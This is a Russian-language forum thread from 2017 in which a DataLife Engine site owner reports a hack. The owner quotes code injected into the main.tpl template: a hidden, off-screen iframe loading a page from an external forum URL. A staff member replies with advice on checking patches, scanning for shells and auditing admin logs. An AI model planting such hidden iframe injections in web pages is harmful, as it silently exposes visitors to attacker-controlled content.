_spawn_ 0 Опубликовано: 22 ноября 2017 Рассказать Опубликовано: 22 ноября 2017 Вчера обнаружил взлом сайта (чужой код обнаружен через сутки после взлома), все обновления и патчи вроде ставились. Версия движка - 9.3. В main.tpl появилась вот такая вставка: <noscript><div><img src="//mc.yandex.ru/watch/7348000" style="position:absolute; left:-9999px;" alt="" /></div></noscript><iframe src="http://forum.academy.com.ua/styles/subsilver2/theme/images/" width=14 height=14 style="position:absolute; left:-9999px;"></iframe> До взлома было вот так: <noscript><div><img src="//mc.yandex.ru/watch/7348000" style="position:absolute; left:-9999px;" alt="" /></div></noscript> Уважаемые админы подскажите, как произошел данный взлом, какой патч нужно использовать, чтобы закрыть уязвимость. Старался ставить все патчи, возможно какой-то не установлен или это новый вид уязвимости? Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 094 Опубликовано: 22 ноября 2017 Рассказать Опубликовано: 22 ноября 2017 5 часов назад, _spawn_ сказал: все обновления и патчи вроде ставились. "Вроде" и "ставились" это вещи принципиально разные. Смотрите весь список патчей https://dle-news.ru/bags/ и сверяйте у себя на сервере начиная от вашей версии, все ли действительно стоит. Поставить патч например постфактум недостаточно, нужно проверить сервер на наличие шеллов. В админпанели DLE есть раздел "Список действий в админпанели", проверяйте там кто редактировал ваши шаблоны. Если там нет редактирования, то сделали вам это минуя DLE и стоит уже обезопаситься и принять меры уже выше, например могли украсть доступы к серверу, или уязвимости в серверном ПО. Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.